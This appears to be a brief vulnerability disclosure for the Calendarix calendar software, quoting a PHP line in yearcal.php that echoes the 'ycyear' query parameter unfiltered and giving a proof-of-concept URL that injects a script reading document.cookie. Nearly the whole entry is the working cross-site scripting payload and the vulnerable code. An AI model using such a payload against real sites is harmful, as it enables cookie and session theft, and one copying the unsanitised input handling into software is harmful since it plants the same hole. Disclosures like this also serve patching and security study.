Website : http://www.calendarix.com Vulnerable : if (!isset($_GET['ycyear'])) $ycyear = $y ; else $ycyear = $_GET['ycyear']; http://www.site.com/[path]/yearcal.php?ycyear=<script>alert(document.cookie)</script>